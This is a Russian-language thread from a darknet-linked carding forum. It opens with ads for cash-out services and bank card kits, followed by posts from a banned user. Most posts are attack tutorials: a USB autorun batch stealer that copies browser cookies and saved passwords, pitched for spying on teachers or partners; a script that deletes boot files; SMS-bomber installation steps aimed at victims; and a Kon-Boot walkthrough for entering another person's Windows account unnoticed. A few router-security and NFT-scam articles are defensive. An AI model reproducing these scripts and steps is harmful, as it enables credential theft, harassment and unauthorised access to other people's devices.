TARANTINO OBNAL SERVICE №1 на рынке теневых услуг.
Депозит 1 млн.


✔️ Профессиональное сопровождение любых финансовых операций.

✔️ Россия, страны СНГ и Европы:

  • ➢ ФИЗ / ЮР лица
  • ➢ Мерчанты
  • ➢ ЭПС
  • ➢ Sim-карты
  • ➢ Работа с криптой по всему миру
  • ➢ Денежные переводы
ПЕРЕЙТИ К ТЕМЕ

ДЕБЕТОВЫЕ КАРТЫ СБЕРМАРКЕТ
  • ⭐️ Пожизненная гарантия от краж.
  • ⭐️ Все в наличии. Экспресс-доставка. Лучшие цены.
  • ⭐️ Ветка 2021 года. Сотни отзывов.
  • ⭐️ Статус Ветеран на ДаркМани.
  • ⭐️ Депозит миллион ₽.
КАРТЫ РФ 🇷🇺
КАРТЫ ГРУЗИИ 🇬🇪
ЛК КАЗАХСТАНА 🇰🇿


БОЛЕЕ 1000 КОМПЛЕКТОВ ДРУГИХ ТОПОВЫХ БАНКОВ ВСЕГДА В НАЛИЧИИ

>>> ПЕРЕЙТИ К ТЕМЕ <<<
Telegram: https://t.me/SberMarketTG

У форума есть зеркало в Тор http://darkmonn6oy55o7kgmwr4jny2gi2zj6hyalzcjgl444dvpalannl5jid.onion
Официальный канал Darkmoney в Телеграм https://t.me/+k1c69d6xQsswYzU0
NEW! 🔥 Чат Darkmoney в Телеграм https://t.me/+q40pcoHjSRVmNTE0

Blackmast_education

Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
USB-хакинг или как украсть пароли с помощью сookie-стиллера

5e19694f1ae3e5ddb16d37c51e764535.jpg


Вступить в наш чат
В этой статье мы расскажем о том, как легко можно украсть учётные записи и пароли браузера с помощью флешки. А так же поговорим, как защитить себя от подобных атак.

2c4a4f42c9fe7b25f1143b2b0fefd3ee.png


Cookie-файлы
– зашифрованные текстовые документы, содержащие информацию о пользователе: статистику, персональные настройки, сохранённые логины и пароли, а также многое другое.
Что это может дать?
Вариантов применения очень много, все лишь зависит от вашей изобретательности. Если вы студент или школьник, то с помощью этого способа вы можете украсть данные препода, тем самым первым узнать о предстоящих контрольных и проверочных работах. Вы также можете проверить вторую половинку или наказать недоброжелателя.
Итак, переходим к пошаговой инструкции:
Создаём cookie-стиллер

1. В первую очередь вам, конечно же, потребуется любая флэшка, где мы создадим следующие текстовые файлы:
autorun.inf
и
stealer.bat
Не забудьте изменить расширения этих файлов с txt на inf и bat.


2. В файле autorun.inf вводим:
Open="stealer.bat"
А в файле stealer.bat пишем:
@echo off​
md %~d0\Mozilla​
md %~d0\0pera​
md %~d0\Google​
md %~d0\Yandex​
md %~d0\Amigo​
CD/D %APPDATA%\Opera\Opera\​
cls​
copy /y wand.dat %~d0\Opera\​
copy /y cookies.dat %~d0\Opera\​
cd %AppData%\Mozilla\Firefox\Profiles\*.default​
copy /y cookies.sqlite %~d0\Mozilla​
copy /y key3.db %~d0\Mozilla​
copy /y signons.sqlite %~d0\Mozilla​
copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla​
cd %localappdata%\Google\Chrome\User Data\Default​
cls​
copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"​
cd %localappdata%\Yandex\YandexBrowser\User Data\Default​
copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex"​
cd %localappdata%\Amigo\User Data\Default​
copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo"​
cls​
ATTRIB -R -A -S -H​
attrib +h %~d0\Mozilla​
attrib +h %~d0\Opera​
attrib +h %~d0\Google​
attrib +h %~d0\Yandex​
attrib +h %~d0\Amigo​
attrib +h %~d0\search.bat​
attrib +h %~d0\new​
attrib +h %~d0\autorun.inf​
del: autorun.inf?​
Стиллер готов. Сохраняем и закрываем.

Но что же делать после того, как вы украли куки? Все просто.
3. Нажимаем Windows+R и вводим:
%appdata%
4. Свои куки на СВОЁМ компьютере удаляем, либо временно скидываем на флешку. А на их место копируем полученные.

5. Теперь скачиваем программу WebBrowserPassView. Здесь уже ничего не надо нажимать - программа сама загрузит и расшифрует куки из ваших браузеров. Просто открываем ее и видим сайты с учётными записями и паролями к ним.

Как защитить себя от cookie-стиллера

Никогда не храните пароли в браузере! Уж лучше в тетрадке под кроватью. Хранить пароли в браузере очень опасно. Но что же делать?
Если вы не можете положиться на свою память, то у вас есть два варианта для хранения:

  • Бумага. Самый традиционный и безопасный способ, если при этом хранить в недоступном месте.
  • Софт для хранения паролей. Если вы до сих пор записываете пароли в текстовом документе/блокноте на ПК, то знайте, что это ни чем не лучше браузера. Вместо этого используйте специальное программное обеспечение для хранения паролей. Например, софт KeePassX, который распространяется бесплатно на базе лицензии GPL и имеет открытый исходный код.
Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!


c51800e5c2aec7ce807ee2a39c893248.jpg

Вступить в наш чат
Раннее мы уже говорили о вирусах и трюках, которые можно проделать в обычном блокноте с помощью простых команд. Сегодня мы продолжаем разбираться в других, не менее интересных способах развлечь себя или своих друзей. Поехали!​
7b3aa1ad3e4b4b32f6b9b6b69498e0d1.jpg
Выключение компьютера

Считаете, что процесс завершения работы с ПК слишком скучный и утомительный? Тогда следующий трюк внесет разнообразие в это обыденные дело. Теперь вы сможете выключать компьютер всего лишь двойным нажатием мышки.​

  • Откройте блокнот и введите следующую команду:
@echo off
msg * System will now shut down
shutdown -c “До встречи” –s


  • Вместо фразы “До встречи” введите любую фразу, она будет отображаться каждый раз перед выключением.
  • Сохраните файл с расширением .bat.
  • Выключатель готов. Теперь для того, чтобы выключить ПК просто нажмите на файл.
Ложное сообщение об ошибке Windows

Этот скрипт послужит отличным розыгрышем для друзей. При открытии жертва увидит поддельное сообщение об ошибке.​

  • Введите команду в блокноте:
p style=»padding-left: 30px;»>X = Msgbox
(«Нажмите OK, и Windows перезагрузится сейчас.», 0 + 16, «В вашей системе серьезная проблема»)


  • Сохраните файл с разрешением .vbs.
Удаление загрузочных файлов с помощью блокнота

Дисклеймер: Этот способ не рекомендуется повторять на своём компьютере, так как вы можете потерять все данные.​
@ECHO OFF ATTRIB -R -S -HC:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT ATTRIB -R -S -HC:\BOOT.INI
DEL C:\BOOT.INI ATTRIB -R -S -HC:\NTLDR
DEL C:\NTLDR ATTRIB -R -S -HC:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI


  • Сохраните как файл .bat.
  • Этим скриптом вы не только выключите компьютер, но и удалите все файлы.
Бесконечно пищащий системный динамик

Ниже приведённой командой вы заставите системный динамик непрерывно издавать пищащий звук.​
Set S = CreateObject("Wscript.Shell") do execute"S.Run ""%comspec% /c "" & Chr(7), 0,True" loop


  • Сохраните как файл .vbs.
Фейковые сообщения об ошибке

Это никакой не вирус, а лишь очередной трюк, который создаст впечатление, что ПК был заражён.​

  • Введите код в блокноте:
@echo off
@echo WARNING VIRUS ATTACK!
@echo WARNING VIRUS ATTACK!
@echo WARNING VIRUS ATTACK!
@echo All Files Deleted. Reboot to Restore.
@echo Press Enter to Reboot
ping 1.1.1.1 -n 1 -w 5000 >NUL
@echo C: Drive Deleted
@echo WARNING! All Files Lost! Virus Detected
@echo Contact Administrator
@echo WARNING! FIREWALL BREACHED!
pause
shutdown -s -f -t 15 -c


  • Последняя строка выключает ПК на 15 секунд. Жертва будет в ужасе)
Поддельный взлом компьютера

Ещё один безопасный розыгрыш, где вы сами можете придумать текст, который увидит жертва.​

  • Открываем блокнот и вводим:
"x=msgbox("Текст сообщения", 5+16, "Заголовок сообщения") точно так, как здесь указано, включая скобки и кавычки, и замените «Текст сообщения» и «Заголовок сообщения» желаемым текстом.


  • Этот скрипт открывает стандартное диалоговое окно ошибки Windows с указанными вами сообщением об ошибке и заголовком окна. Чтобы ваш розыгрыш был правдоподобным, используйте сообщения и заголовки, похожие на реальные. Например, "В каталоге C://Users/Windows/system32 обнаружена критическая неисправность" или же заставьте человека думать, что вы взломали его, написав: «Я тебя взломал и теперь имею полный доступ ко всем файлам. Страшно?».
  • Выражение «5+16» указывает компьютеру создать диалоговое окно с иконкой критической ошибки и двумя кнопками «Повтор» и «Отмена». Изменяя эти числа, можно получить разные типы окон с ошибками. Просто подставьте из приведенных ниже чисел любое число из одной цифры вместо 5 и любое число из двух цифр вместо 16:0 (Кнопка OK)
1 - (Кнопки OK и Отмена)
2 - (Кнопки Отмена, Повтор и Пропустить)
3 - (Кнопки Да, Нет, и Отмена)
4 - (Кнопки Да и Нет)
5 -(Кнопки Повтор и Отмена)
16 - (Иконка критической ошибки)
32 - (Иконка помощи)
48 - (Иконка предупреждения)
64 - (Иконка информации)​

  • Вы можете повторять команды любое количество раз, используя разные сообщения об ошибках.
  • В конечном счёте сохраните файл с расширением .vba и выберите «Все файлы» из выпадающего списка «Тип файла».
На этом все. Удачных экспериментов с блокнотом!​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как зафлудить телефон человека с помощью смс

abcd1402bff36856152b60f65ad992df.jpg


Вступить в наш чат
В сегодняшней статье мы расскажем как перегрузить телефон жертвы спамом. Данный способ является очень действенным и даже может вывести телефон из строя на время.​
Дисклеймер: Вся информация, опубликованная в этой статье, предоставлена лишь в ознакомительных целях. Мы ни к чему не призываем и не несём ответственности за ваши действия.

b81768236e723396b001630408dd8a92.jpg



СМС-бомбер - это ПО для массовой рассылки сообщений на заданный номер телефона. СМС-атака зачастую используется как способ отвлечения внимания жертвы при осуществлении взлома социальных сетей, кражи денег с кредитки или просто как метод психологического давления.


1-й способ - на компьютере

В первую очередь вам необходимо скачать и установить две программы:

Как только завершится установка, откройте Git и нажмите правой кнопкой мыши по рабочему столу, выбрав "Git Bash Here".


67601cbad522babf17eef4e10d397cc7.jpg



Следующим действием прописываем команды:

Далее заходим в папку с бомбером:

  • cd b0mb3r
Теперь устанавливаем библиотеку:

  • pip install -r requirements.txt
И запускаем:

  • python main.py
В браузере откроется вкладка с бомбером, где вам нужно будет заполнить поле:


2d468733e1d4fd4bc7d12bb6f16efb80.jpg



2-й способ - на телефоне
Вы также можете выполнить установку смс бомбера на телефоне.
Для этого скачиваем Termux.
После установки пишем эти команды:

  • pkg update && pkg upgrade (обновляем пакеты)
  • pkg install python (устанавливаем Python)
  • pkg install git (устанавливаем Git)
  • git clone https://github.com/crinny/b0mb3r (клонируем репозиторий)
  • cd b0mb3r (переходим в директорию с бомбером)
  • pip install -r requirements.txt (устанавливаем библиотеку)
  • python main.py (запускаем)
Если браузер не открывается, тогда скопируйте следующую ссылку:


477fc39ec4496933de9d52795ad2d801.jpg



И затем ее вставляем в адресную строку браузера:


e3b52a9e7c99dfb286be83cb9bc2a985.jpg



Теперь у вас откроется та же самая вкладка, как в 1-ом способе. Заполните поле и атака начнётся.


1f4cca3d31fc4a77d8c2a7e8dfe502f4.jpg
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как взломать пароль Windows и войти в учётную запись без следов

2a908c9845981b5d661bb6a63cbbb8e4.jpg



Вступить в наш чат
Хотите узнать, как войти в компьютер другого человека, не зная при этом пароля? Да так, чтобы жертва еще не догадалась о ваших планах? Звучит интригующе? Тогда сядьте поудобнее и приготовьтесь к прочтению нашего простого мануала. И нет, вам не нужно быть профессиональным хакером или программистом, чтобы провернуть все это. Мы расскажем как просто проникнуть в ПК с помощью одной лишь программы - Kon-Boot.

d3934d9194253232c91771be183c7012.jpg


Kon-Boot — программа, временно изменяющая содержимое ядра Windows. Она позволяет войти в учётную запись без пароля, не сбрасывая его. При повторном включении содержимое ядра восстанавливается, и снова запрашивается пароль, поэтому пользователь ПК ничего не заметит.
Для того, чтобы провернуть все это вам потребуется:
1. USB-накопитель;
2. Программа Kon-Boot. Скачать здесь.
Установка программы Kon-Boot на флешку

  • Вставляем флешку в USB разъём.
  • После того как вы распаковали программу, откройте папку Kon-Boot for Windows 2.5.0 и запустите файл KonBootInstaller от имени администратора.
dc0dfefc53a6ebdaabaf929e2b113943.jpg


Далее появится окно с предостережением о том, что в ПК должна находится только одна флешка, иначе во время установки может быть выдана ошибка. Если готовы к установке, то подтвердите.

В разделе Available USB drivers из выпадающего списка выберите флешку и нажмите Install to USB stick (with EFI support).

deb4bceffb7e68c18d332007a9b06565.jpg


  • Имейте ввиду, что вся информация, за исключением программы Kon-Boot, во время установки будет утеряна. Если на флешке ничего важного не осталось, то жмём «Да».
8f25b68b1d283fd8da530fe2b950e8ed.jpg


  • Теперь запустится установка:
b94df7867ce212d32872b5fe865cedde.jpg


Если вы столкнётесь с ошибкой:
Fatal: unable to copy C:\Kon-Boot for Windows 2.5.0\kon-bootUSB\USBFILES\menu.lst to G:\menu.lst, error = 0x00000002 (file exists=0)​
То переименуйте файл konboot.lst в menu.lst, после чего заново запишите Kon-Boot на флешку через KonBootInstaller.exe, тогда ошибка будет устранена.

  • По завершению установки, нажмите «Оk».
3c86881a5e09b18d26f3e6ac0c77ec90.jpg


Запуск флешки на ПК

  • Вставляем USB-накопитель с программой в разъём и запускаем ПК.
  • Далее вызываем Boot menu. На разных материнских платах клавиши вызова Boot menu отличаются, поэтому сверьтесь с таблицей ниже:
67b148281f3306cfc2df28fb87d42d0e.jpg

  • Если же вы не знаете какая материнка стоит на компьютере, то обесточьте его и откройте боковую крышку системного блока, там вы найдёте модель.
2b663658c08b01c3e35a5bcefae7521e.jpg


  • выбираем загрузку с флешки и кликаем «Enter».
  • В новом окне выберите Kon-Boot (CURRENT VERSION) и нажмите «Enter».
  • Далее на экране появится надпись Kon-Boot, после чего начнётся загрузка Windows.
67a2ef80980ed31e4a146fece0ec252f.jpg
Если на экране появилась надпись «No Systemdisk. Booting from harddisk. Start booting from USB device…» — переустановите Kon-Boot используя KonBootInstaller.exe.​
Если же на экране появилась надпись «Dummy bios detected trying to fix smap entries» — Вам необходимо в настройках BIOS выключить опцию Secure boot, а также включить опции Load Legacy Option Rom / CSM.​
  • Когда ПК запросит пароль, оставьте поле пустым, либо введите случайные символы (Windows примет их как за правильный пароль) и нажмите «Enter».
Готово! Вы успешно обошли пароль. При повторном включении компьютера, все вернётся на свои места.

Вся информация в этой статье написана исключительно в ознакомительных целях.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
GHOST - одна из самых анонимных криптовалют

02ce4590e35ce060f41e761e0ac398f1.jpg



Вступить в наш чат
Ни для кого не секрет, что информация о транзакциях в блокчейне является общедоступной, а адрес криптокошелька легко соотнести с личностью пользователя, поэтому можно сделать вывод о том, что большинство криптовалют не анонимны. Но позитивным моментом является тот факт, что существует ряд криптовалют, ориентированных на приватность. Одной из таких является Ghost. В этой статье мы расскажем чем же отличается эта криптовалюта от любой другой и правда ли она полностью конфиденциальна.

5781163301fb777308781b256ca84a04.jpg

На момент появления Биткоина в 2009 году считалось невозможным определить личность владельца криптобиржи. Однако, сейчас мы знаем о том, что любой человек может отслеживать путь перемещения биткоинов в блокчейне и сопоставлять адреса кошельков с конкретными личностями.
Но с тех пор прошло много времени и компании пересмотрели концепцию анонимной криптовалюты. Для наглядности давайте посмотрим на очевидные отличия GHOST от других не менее популярных криптовалют :


44e8a230a212ee1feeb0a775cde9d5cd.png




  • Итак, протокол Dandelion, он же одуванчик, делит транзакции на две части:
«Стебель». Данные переходят от 1-го узла ко 2-му рандомное количество раз. Иначе говоря, передаются от одного человека к другому.
«Пух». Последний, у кого они оказались, рассылает их по всей сети. Так, как это бы происходило в обычном блокчейне.
Появляется элемент непредсказуемости, поэтому невозможно отследить изначальный источник отправления. Как видно из таблицы, похожий протокол применяется лишь в Monero.

  • Cold-Staking. Стейкинг — это блокировка своей криптовалюты для получения дальнейшей прибыли. Обычно для стейкинга нужно находится в онлайне и раскрывать адрес своего кошелька. Но в Ghost этот момент решается с помощью холодного стейкинга без подключения к интернету. Это помогает сделать процесс стейкинга более конфиденциальным.
  • Ghost Pay. Как и у всех анонимных криптовалют, Ещё одним отличием Ghost от других криптокошельков является возможность получать и отправлять криптовалюту прямо внутри Telegram бота @GhostPayBot.
Где покупать Ghost

Практически на всех криптобиржах есть обязательная верификация личности. Чтобы сохранить анонимность, необходимо покупать криптовалюту с осторожностью. Вот список конфиденциальных способов купить GHOST:

  1. TradeOgre. Эта криптобиржа ориентируется на конфиденциальность и не разглашает информацию о своих клиентах третьим лицам. Если вы хотите зарегистрироваться на ней, вам понадобится электронная почта и аутентификатор — приложение, генерирующее код входа. GHOST торгуется в паре с BTС, а комиссия составляет 0,01 GHOSТ.
  2. HotBit. Эта биржа является одной из крупнейших в мире по объёму торгов. Чтобы зарегистрировать, необходимо подтвердить телефон. GHOST торгуется с тремя другими криптовалютами: USDT, BTC и ETH. Комиссия за вывод составляет 11 GHOST.
  3. GhostX. Это своего рода обменник без посредников. Чтобы начать им пользоваться нужно только подключить свой криптокошелек. Обменять GHOST можно на 26 доступных криптовалют. Комиссия зависит от уровня загрузки сети.
Хотя существуют и другие сервисы для покупки и обмена криптовалюты GHOST, но они собирают больше данных о вас, а значит менее конфиденциальны.
Вывод

Ghost — это анонимная криптовалюта, в основе которой лежат Patrticl, который в свою очередь произошел от Биткоина. В отличие от аналогов, в ней используются технологии Proof-of-Stake, RingCT и Dandelion++, а так же Ghost Pay, который работает с Telegram.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
24ddb5297623a1f8e71460aa1af735eb.jpg


Вступить в наш чат
Кто бы мог подумать, что такое устройство как Wi-Fi-роутер может стать серьёзной угрозой для вашей личной безопасности. Большинство людей пренебрегают защитой беспроводных маршрутизаторов, потому что недооценивают возможный вред, который может нанести злоумышленик, взломав ваше соединение. В этой статье вы узнаете чем это опасно и найдете простые способы защиты роутера.​
dc1581e1fdfa17ca1d63fc7b42629677.jpg



Что случится, если ваш роутер взломают?


  • Перехват паролей и других данных, которые вы передаёте по сети;
  • Заражение компьютера вредоносным ПО;
  • Слежка за вашей активностью в сети;
  • Блокировка Интернет-соединения;
  • Доступ к веб-камерам;
  • Использование вашего соединения для совершения преступной деятельности.
И многое другое…
Взлом роутера – это настоящая угроза для любого пользователя со серьёзными последствиями. Но не стоит впадать в панику, ведь «спасение утопающих – дело рук самих утопающих», и сейчас мы поделимся с вами способами защиты от подобных атак.
Как защитить роутер от хакеров

Измените учетные данные администратора роутера

Учетные данные администратора по умолчанию находятся в общем доступе для всех пользователей. Если вы никогда не обновляете учетные данные для входа в систему после получения роутера, вас можно считать легкой добычей для хакеров, потому мы настоятельно рекомендуем устанавливать надёжный пароль. Для этого:

  • Откройте браузер и введите в адресную строку цифры 192.168.0.1. Если ничего не произошло, попробуйте 192.168.1.1 и 10.0.0.1. Далее выскочит окно с полями для логина и пароля.
  • Введите логин admin и пароль admin. Если не подошли — посмотрите стандартный пароль в инструкции к роутеру или на его корпусе.
  • Найдите на странице ссылку с надписью Wi-Fi или Wireless. Откроется вкладка, где вы сможете изменить пароль.
Включите WPA2 (защищенный доступ Wi-Fi)

Это самый безопасный на сегодняшний день протокол шифрования. В сочетании с надёжным паролем он даст вам прочную защиту. Вы также можете встретить его другой вариант - это WPA-PSK.



eab87ea1c22eff731a0a9c2c11d6c015.jpg



Правильный протокол шифрования не менее важен, чем пароль. Например, устаревший протокол WEP может быть с лёгкостью взломан за пару часов.
Измените сетевое имя вашего роутера (SSID)

Во время настройки роутера также не забудьте изменить SSID. Чтобы хакеры не смогли узнать ваш тип роутера, установите свое собственное сетевое имя. Шифрование WPA использует SSID как часть алгоритма, поэтому избегайте имён по умолчанию, так вы сделаете свою сеть более устойчивой к разным видам взлома.
Отключите WPS

На большинстве роутеров есть WPS (защищенная настройка Wi-Fi), что означает, вы можете нажать кнопку и ввести PIN-код для подключения вместо привычного пароля. Возможно, для кого-то такая функция является очень удобной, но мы не советуем использовать PIN-код вместо пароля. Ведь одним нажатием кнопки WPS, любой сможет подключиться к сети.
К сожалению, не все роутеры поддерживают деактивацию функций WPS, поэтому заранее позаботьтесь о том, чтобы у вашего роутера была такая функция.
Деактивируйте удаленный доступ

Проверьте, подключена ли функция удаленного администрирования на вашем роутере. Она позволяет входить в настройки администратора роутера из любой точки. Деактивировав эту функцию, вы повысите уровень защиты вашего соединения. Как узнать, что удалённый доступ подключён на вашем устройстве?Зайдите в веб-интерфейс и посмотрите, подходит ли стандартная учётная запись admin / admin, если да, то скорее измените пароль.
Заключение

Все выше написанные советы гарантированно обеспечат безопасность вашему Wi-Fi-роутеру, поэтому приступайте к их выполнению прямо сейчас. А в следующей части мы расскажем, как понять, что ваш роутер уже был взломан, и какие меры нужно принять в таком случае.
Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Виды скама с NFT и как защититься

1a5ac89a15b03d586493f5f1ef822dac.jpg



Вступить в наш чат
С растущей популярностью NFT-токенов, набирают обороты разные способы мошенничества, которые становятся все изощреннее. Если вам кажется, что вы знаете о криптоскамерах все, то не спешите уходить, нам есть чем вас удивить.

bc6e31e0def1f44b974ff676fcc7dc2a.png

Rug Pull

Схема мошенничества, при которой разработчики забрасывают проект, забирают деньги и уходят в закат. Как правило, разработчики выпускают новую коллекцию NFT, пускают все ресурсы на рекламу проекта и в̶е̶ш̶а̶ю̶т̶ ̶л̶а̶п̶ш̶у̶ ̶н̶а̶ ̶у̶ш̶и̶ красочно рассказывают о планах на развитие. По мере того, как проект набирает популярности среди инвесторов, скамеры удаляют соцсети и оставляют проект без поддержки. Как результат, пользователи, вложившие деньги, остаются с NFT, которые ничего не стоят. Зачастую участниками ****-проекта становятся, ничего не подозревающие, медийные персоны. Для того чтобы привлечь внимание к проекту проводятся различные розыгрыши и раздачи, которые вызывают у людей интерес к проекту. Приведем в пример Флойда Мейвезера, который рекламировал в своем Twitter такие проекты, как Bored Bunny, Ethereum Max, Moonshot.
На Frosties, одном из самых громких ****-проектов в США мошенники заработали 1 млн долларов. Они не выполнили обещаний и исчезли вместе с деньгами инвесторов.
Фишинг

Распространённый способ мошенничества, когда злоумышленники получают доступ к данным пользователей с помощью ссылок на поддельные сайты, имитирующих страницы известных криптопроектов.
Орудуют такие скамеры, как правило, в соцсетях, отправляя рассылки от имени известных NFT-проектов. В таких сообщениях содержатся завлекательные условия, например: скидка на покупку NFT. Однако, при переходе по ссылке, вы попадёте на фишинговый сайт, а при покупке, лишитесь средств со всего кошелька.
В числе жертв фишинговой атаки оказался популярный NFT-художник Beeple. Скамеры взломали его Twitter и разместили ссылку на фейковую коллекцию совместного NFT с Louis Vuitton. В итоге подписчики, решившие купить NFT, лишились денег, а мошенники получили ETH на сумму в 438 тысяч долларов.

Pump Dump

Манипуляция, которая позволяет повысить курс NFT с последующим обвалом цены. Скамеры всеми способами создают ажиотаж вокруг NFT для дальнейшего повышения цены токенов (памп). Затем стоимость токена обесценивается (дамп), и инвесторы теряют деньги.
Логан Пол, актер с 23 миллионами подписчиков на ютубе, стал еще одной медийной личностью, замеченной в продвижении мошеннических проектов. Ему удалось привлечь внимание к таким NFT, как Dink Doink NFT, Crypto Zoo, EMAX и Maverick. Так, их популярность вместе с ценой резко возрастали, а затем падали.
Фейковые коллекции

Мошенники подделывают коллекции известных NFT художников, а затем публикуют их на торговых площадках. Инвесторы думают, что покупают оригинал, а на самом деле это лишь фейк.
С помощью этого способа в апреле 2021 года мошенники умудрились продать коллекции, уже умершей на тот момент, художницы Qinni. Когда ее семья забыла тревогу, скамеры уже завладели кругленькой суммой денег доверяемых подписчиков.
Как не попасться


  • Внимательно проверяйте домен сайта, к которому подключается кошелек. Дабы не зайти на фишинговый сайт, сохраните в закладках реальные ссылки на площадки, которыми вы пользуетесь;
  • Если в соцсети какого-то проекта появляется выгодное предложение, не спешите покупать. Проверьте и другие источники, есть вероятность, что аккаунт был взломан хакерами;
  • Многообещающие предложения о дальнейшем развитии проекта также должны насторожить вас. Чтоб на попасться на схему Rug pull, отдавайте предпочтение проектам с реальными и хорошо распланированными целями;
  • Смотрите на показатель ликвидности. Высокий объем торгов указывает на то, что коллекция активно покупается и продаётся, а значит вы можете продать NFT на вторичном рынке.
С развитием NFT, появляются и новые способы мошенничества, но знания и умения распознать угрозу помогут вам сберечь средства. Здраво оценивайте все предложения и проверяйте интересующие проекты. Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Мой роутер взломали - что делать

582ac9f6b0860abcfa6e0bcbfd2b2560.jpg



Вступить в наш чат
В прошлой статье мы рассказали, как защитить свой роутер от хакеров, и чем опасен взлом. Но как понять, что ваша сеть стала уязвимой, и как вернуть над ней контроль? Обо всем по порядку.​
Мы надеемся, что вы учли и предприняли все наши советы по безопасности роутера, но если вы всё-таки заметили подозрительную активность на вашем ПК или просто хотите убедиться, что с вашим Wi-Fi все в порядке, то советуем обратить внимание на следующие признаки, свидетельствующие о том, что вас хакнули.


2f5bd3f233a1761c998811125a9db3bf.jpg



Как понять, что ваш роутер взломан:

  • В сети Wi-Fi появились новые устройства. Чтобы узнать, подключалось ли к сети неизвестное устройство, войдите в свой роутер и проверьте список IP-адресов в вашей сети на наличие иных подключений.
  • Изменились настройки DNS. Хакеры часто меняют настройки для подключения к вредоносным серверам, которые крадут ваши персональные данные и даже заражают устройство вирусами. Для того, чтобы узнать к какому серверу подключается ваш ПК, зайдите в DNS настройки вашего роутера в меню администратора.
  • Учетные данные администратора изменились. Если вы не можете подключиться к сети Wi-Fi, то логично предположить, что хакеры поменяли пароль и учетные данные вашего роутера, тем самым лишили вас доступа к Интернету.
  • Скорость интернета упала. Хотя причин этому очень много, но, если вы проверили все параметры, а скорость так и не увеличилась, то есть вероятность, что злоумышленник использует пропускную способность вашего Wi-Fi.
  • Вредоносное ПО. Наличие вируса - это повод бить тревогу. Если вы не могли самостоятельно подцепить вредоносную программу, то скорее всего кто-то это сделал за вас.
Если вы обнаружили на своём устройстве более 2-х вышеназванных пунктов, то ваш роутер скорее всего взломали.
Как вернуть контроль над устройством:

Выполнив следующие действия, вы не только избавитесь от хакеров, но и очистите свой компьютер от вредоносного ПО.
Выключите роутер

Первым действием требуется разорвать соединение между вашим устройством и хакером. Для этого отсоедините интернет-кабели и на время отключите все устройства, подключённые к Wi-Fi.
Сбросьте роутер до заводских настроек

Все роутеры оснащены специальной кнопкой сброса, вам, возможно, пригодится скрепка или иголка, чтобы нажать на нее.
Сброс к заводским настройкам удаляет все изменения параметров роутера, в том числе все сетевые настройки, которые были ранее установлены. Если злоумышленнику известен пароль и учетные данные администратора, то они станут недоступны после сброса.
Измените учетные данные администратора

После сброса восстановите заводские настройки по умолчанию. На самом роутере или в руководстве записаны логин и пароль для входа, используйте их. Однако, сразу же поменяйте их на сложную комбинацию букв и цифр, состоящих не менее чем из 15 символов, дабы избежать повторной атаки.
Установите SSID и пароль Wi-Fi

Помните, что сложные названия и пароли защищают вашу сеть от взлома.
Обновляйте прошивку

Не все роутеры автоматически обновляют прошивку, поэтому лично позаботьтесь об этом. Зайдите в меню администратора -> настройки прошивки и обновите ее до новейшей версии. Любые хакерские атаки, нацеленные на вашу старую прошивку, должны стать неэффективными. Раз в пару месяцев проверяйте наличие новых прошивок и обновляйте их.


В дальнейшем любые атаки на ваш роутер станут неэффективными.
Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Делаем смс-бомбер на iOS

3ca8c5f7a695aefafdf499bb5683fce1.jpg


Вступить в наш чат
Сегодня мы расскажем вам о карманной альтернативе Linux на iOS, и как с помощью неё устроить бомбер атаку всего за 5 минут.​
​​iSH Shell- это приложение в AppStore, которое может стать полноценным эмулятором линукс на вашем яблочном гаджете.
Первым делом заходим в AppStore и скачиваем программу iSH Shell.


9029f3288da9a75fe71fb34cf78736ca.jpg




Открываем приложение и начинаем по отдельности вводить команды.

  • Обновим в терминале список пакетов:
apk update
446d4fc0703c9d8ab50cb779a42e2c2f.jpg

apk upgrade
apk add git
  • Для работы смс-бомбера потребуется python:
apk add python
apk add python3
  • Так же pip3:
apk add py3-pip
  • Далее установим requests и colorama:
pip3 install requests
pip3 install colorama
  • После загрузки вышеуказанных компонентов, перейдем к самому бомберу:
  • Когда скрипт завершит установку, запускаем его:
cd smsham
python3 smsham.py
  • Готово. Теперь вас попросят ввести номер телефона. Вводим и подтверждаем с помощью enter.
  • Чтобы остановить работу бомбера, нажмите ctrl + z.


Заключение

iSH Shell - настоящая находка для карманного хакинга на вашем apple устройстве. При желании вы можете найти большое количество применений для данной программы, которые не будут уступать Linux. В следующей же части вы узнаете, как с помощью iSH cделать DDoS атаку.
Удачи!
Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как создать холодный кошелёк на USB

0c69f3aa76e620c843bfe0a8b1ecf8bc.jpg


Вступить в наш чат
Когда речь заходит про криптовалюту, мнения единогласно сходятся в том, что самым безопасным способом её хранения является холодный кошелёк. В любой системе хранения, работающей через Интернет, может случиться сбой, именно поэтому холодные кошельки так пользуются популярностью. Сегодня мы наглядно расскажем, как можно создать свой холодный кошелек для криптовалюты, используя USB-накопитель и Tails.

bf26b27871c584fe258d0bd706148681.jpg



Холодный кошелёк хранит ваш закрытый ключ и другие данные без использования Интернета, что и делает его более надёжным.
